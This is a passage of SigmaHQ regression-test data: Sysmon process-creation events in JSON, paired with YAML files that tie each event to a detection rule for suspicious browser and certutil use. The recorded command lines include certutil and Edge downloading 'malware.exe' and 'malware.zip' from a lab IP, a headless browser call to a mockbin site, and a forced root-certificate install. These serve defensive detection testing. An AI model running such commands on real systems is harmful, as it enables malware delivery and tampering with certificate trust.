"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": 
"SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ParentProcessId": 10048, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml ================================================ id: 941b970d-535f-4543-8985-768e589fa8ff description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e title: File Download with Headless Browser regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T23:25:03.181097Z" } }, "EventRecordID": 32923086, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { 
"#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-26 23:25:03.169", "ProcessGuid": "5AA13A44-ADCF-68FE-295E-000000004002", "ProcessId": 4788, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "FileVersion": "141.0.7390.123", "Description": "Google Chrome", "Product": "Google Chrome", "Company": "Google LLC", "OriginalFileName": "chrome.exe", "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --load-extension=\"C:\\Users\\user\\AppData\\Local\\Temp\\HHe2lr\"", "CurrentDirectory": "C:\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ParentProcessId": 10048, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml ================================================ id: e159e6ce-c717-4a38-af44-ff8c4f011c37 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 title: Chromium Browser Instance Executed With Custom Extension regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx ================================================ FILE: 
regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T23:28:43.862519Z" } }, "EventRecordID": 32995046, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-26 23:28:43.810", "ProcessGuid": "5AA13A44-AEAB-68FE-435E-000000004002", "ProcessId": 5784, "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "FileVersion": "141.0.3537.99", "Description": "Microsoft Edge", "Product": "Microsoft Edge", "Company": "Microsoft Corporation", "OriginalFileName": "msedge.exe", "CommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709", "CurrentDirectory": "C:\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D", "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ParentProcessId": 10048, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": 
"\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml ================================================ id: 686da1dd-caec-47d8-a254-07ab54f1f3c7 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 1c526788-0abe-4713-862f-b520da5e5316 title: Chromium Browser Headless Execution To Mockbin Like Site regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T23:30:09.492105Z" } }, "EventRecordID": 33024467, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-26 23:30:09.480", "ProcessGuid": "5AA13A44-AF01-68FE-535E-000000004002", "ProcessId": 2536, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "FileVersion": "141.0.7390.123", "Description": "Google Chrome", "Product": "Google 
Chrome", "Company": "Google LLC", "OriginalFileName": "chrome.exe", "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --load-extension=\"C:\\Users\\user\\AppData\\Local\\Temp\\HHe2lr\"", "CurrentDirectory": "C:\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ParentProcessId": 10048, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml ================================================ id: 78e88bc4-deea-488e-a27f-b4d9d07d3a72 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 27ba3207-dd30-4812-abbf-5d20c57d474e title: Suspicious Chromium Browser Instance Executed With Custom Extension regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": 
"5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T23:34:35.016637Z" } }, "EventRecordID": 33119645, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-26 23:34:35.002", "ProcessGuid": "5AA13A44-B00B-68FE-9F5E-000000004002", "ProcessId": 4584, "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "FileVersion": "141.0.3537.99", "Description": "Microsoft Edge", "Product": "Microsoft Edge", "Company": "Microsoft Corporation", "OriginalFileName": "msedge.exe", "CommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" \"http://10.0.1.14/malware.zip\"", "CurrentDirectory": "C:\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D", "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ParentProcessId": 10048, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml ================================================ id: c7f0da2b-2eb9-46ee-abd0-d2f8e3c81975 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 
94771a71-ba41-4b6e-a757-b531372eaab6 title: File Download From Browser Process Via Inline URL regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T23:39:33.565515Z" } }, "EventRecordID": 33232425, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-26 23:39:33.564", "ProcessGuid": "5AA13A44-B135-68FE-035F-000000004002", "ProcessId": 10712, "Image": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe", "FileVersion": "128.14.0", "Description": "Tor Browser", "Product": "Tor Browser", "Company": "Mozilla Corporation", "OriginalFileName": "firefox.exe", "CommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe\"", "CurrentDirectory": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "Medium", "Hashes": 
"SHA1=9D317F48BA264346D1BA2DA10B0893B156FA69BF,MD5=66D34277F992DB4CA8561FD1A5C483E4,SHA256=683574EBC203C630AF98256516D7CBC50E270E7C5A56E1D46CB9CA671B3D9F32,IMPHASH=EEC7642CF938691D739D1F9BED0DF74D", "ParentProcessGuid": "5AA13A44-B135-68FE-025F-000000004002", "ParentProcessId": 1292, "ParentImage": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe", "ParentCommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml ================================================ id: 8e750cec-bc57-4b20-bd0a-006733558c56 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c title: Tor Client/Browser Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T16:54:23.873276Z" } }, "EventRecordID": 11383720, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": 
"ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 16:54:23.866", "ProcessGuid": "5AA13A44-00BF-68FD-3F35-000000004002", "ProcessId": 8592, "Image": "C:\\Windows\\System32\\certutil.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "CertUtil.exe", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil -addstore -f root C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\cert.cer", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml ================================================ id: 5969ddb0-b4ab-47c9-a12b-471d6c6551c8 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: d2125259-ddea-4c1c-9c22-977eb5b29cf0 title: New Root Certificate Installed Via Certutil.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx ================================================ 
FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T16:56:16.019794Z" } }, "EventRecordID": 11418519, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 16:56:16.013", "ProcessGuid": "5AA13A44-0130-68FD-4E35-000000004002", "ProcessId": 5112, "Image": "C:\\Windows\\System32\\certutil.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "CertUtil.exe", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil -decode file.base64 file-decoded.ext", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" 
} } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/info.yml ================================================ id: e582dfce-5cb3-4991-9719-9a336eb90a6f description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7 title: File Decoded From Base64/Hex Via Certutil.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:02:36.900637Z" } }, "EventRecordID": 11537869, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:02:36.894", "ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002", "ProcessId": 6484, "Image": "C:\\Windows\\System32\\certutil.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "CertUtil.exe", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil.exe 
-urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/info.yml ================================================ id: ee435dcb-08cb-4de1-bb70-bdd27cf0dae9 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b title: Suspicious Download Via Certutil.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, 
"Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:01:06.116464Z" } }, "EventRecordID": 11507958, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:01:06.109", "ProcessGuid": "5AA13A44-0252-68FD-7235-000000004002", "ProcessId": 6432, "Image": "C:\\Windows\\System32\\certutil.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "CertUtil.exe", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil.exe -urlcache -f http://10.0.1.14/malware.exe malware-ctl.exe", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml ================================================ id: 76e024fd-9064-46ae-85f8-c524dc6b3492 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 title: Suspicious File Downloaded From Direct IP Via Certutil.EXE 
regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:02:36.900637Z" } }, "EventRecordID": 11537869, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:02:36.894", "ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002", "ProcessId": 6484, "Image": "C:\\Windows\\System32\\certutil.exe", "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", "Description": "CertUtil.exe", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "CertUtil.exe", "CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": 
"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml ================================================ id: 507f6de5-f414-4825-b1a3-e8909fdc8700 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:04:22.017117Z" } }, "EventRecordID": 11570013, "Correlation": null, 